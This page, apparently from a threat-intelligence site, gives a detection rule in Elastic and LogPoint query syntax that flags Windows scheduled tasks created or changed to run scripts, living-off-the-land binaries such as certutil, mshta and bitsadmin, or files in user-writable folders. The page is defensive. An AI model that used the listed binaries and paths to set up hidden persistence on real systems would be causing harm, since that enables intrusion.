((winlog.event_id:("4688" OR "1") AND process.command_line:*SCHTASKS* AND process.command_line:(*\/CREATE* OR *\/CHANGE*)) AND (process.command_line:(*.cmd* OR *.ps1* OR *.vbs* OR *.py* OR *.js* OR *.exe* OR *.bat*) OR process.command_line:(*javascript* OR *powershell* OR *wmic* OR *rundll32* OR *cmd* OR *cscript* OR *wscript* OR *regsvr32* OR *mshta* OR *bitsadmin* OR *certutil* OR *msiexec* OR *javaw*) OR process.command_line:(*%APPDATA%* OR *\\AppData\\Roaming* OR *%PUBLIC%* OR *C\:\\Users\\Public* OR *%ProgramData%* OR *C\:\\ProgramData* OR *%TEMP%* OR *\\AppData\\Local\\Temp* OR *\\Windows\\PLA\\System* OR *\\tasks* OR *\\Registration\\CRMLog* OR *\\FxsTmp* OR *\\spool\\drivers\\color* OR *\\tracing*))) OR (winlog.event_id:("4698" OR "4702") AND (winlog.event_data.TaskContent:(*.cmd* OR *.ps1* OR *.vbs* OR *.py* OR *.js* OR *.exe* OR *.bat*) OR winlog.event_data.TaskContent:(*javascript* OR *powershell* OR *wmic* OR *rundll32* OR *cmd* OR *cscript* OR *wscript* OR *regsvr32* OR *mshta* OR *bitsadmin* OR *certutil* OR *msiexec* OR *javaw*) OR winlog.event_data.TaskContent:(*%APPDATA%* OR *\\AppData\\Roaming* OR *%PUBLIC%* OR *C\:\\Users\\Public* OR *%ProgramData%* OR *C\:\\ProgramData* OR *%TEMP%* OR *\\AppData\\Local\\Temp* OR *\\Windows\\PLA\\System* OR *\\tasks* OR *\\Registration\\CRMLog* OR *\\FxsTmp* OR *\\spool\\drivers\\color* OR *\\tracing*)))
LogPoint - LogPoint Search - Scheduled Task creation or modification containing suspicious script, extension or user writable path.
((event_id IN ["4688", "1"] CommandLine="*SCHTASKS*" CommandLine IN ["*/CREATE*", "*/CHANGE*"]) (CommandLine IN ["*.cmd*", "*.ps1*", "*.vbs*", "*.py*", "*.js*", "*.exe*", "*.bat*"] OR CommandLine IN ["*javascript*", "*powershell*", "*wmic*", "*rundll32*", "*cmd*", "*cscript*", "*wscript*", "*regsvr32*", "*mshta*", "*bitsadmin*", "*certutil*", "*msiexec*", "*javaw*"] OR CommandLine IN ["*%APPDATA%*", "*\\AppData\\Roaming*", "*%PUBLIC%*", "*C:\\Users\\Public*", "*%ProgramData%*", "*C:\\ProgramData*", "*%TEMP%*", "*\\AppData\\Local\\Temp*", "*\\Windows\\PLA\\System*", "*\\tasks*", "*\\Registration\\CRMLog*", "*\\FxsTmp*", "*\\spool\\drivers\\color*", "*\\tracing*"])) OR (event_id IN ["4698", "4702"] (TaskContent IN ["*.cmd*", "*.ps1*", "*.vbs*", "*.py*", "*.js*", "*.exe*", "*.bat*"] OR TaskContent IN ["*javascript*", "*powershell*", "*wmic*", "*rundll32*", "*cmd*", "*cscript*", "*wscript*", "*regsvr32*", "*mshta*", "*bitsadmin*", "*certutil*", "*msiexec*", "*javaw*"] OR TaskContent IN ["*%APPDATA%*", "*\\AppData\\Roaming*", "*%PUBLIC%*", "*C:\\Users\\Public*", "*%ProgramData%*", "*C:\\ProgramData*", "*%TEMP%*", "*\\AppData\\Local\\Temp*", "*\\Windows\\PLA\\System*", "*\\tasks*", "*\\Registration\\CRMLog*", "*\\FxsTmp*", "*\\spool\\drivers\\color*", "*\\tracing*"]))

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, CM-02, CM-05, CM-06, CM-07, CM-08, IA-02, IA-04, RA-05, SI-04
D3FEND12 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin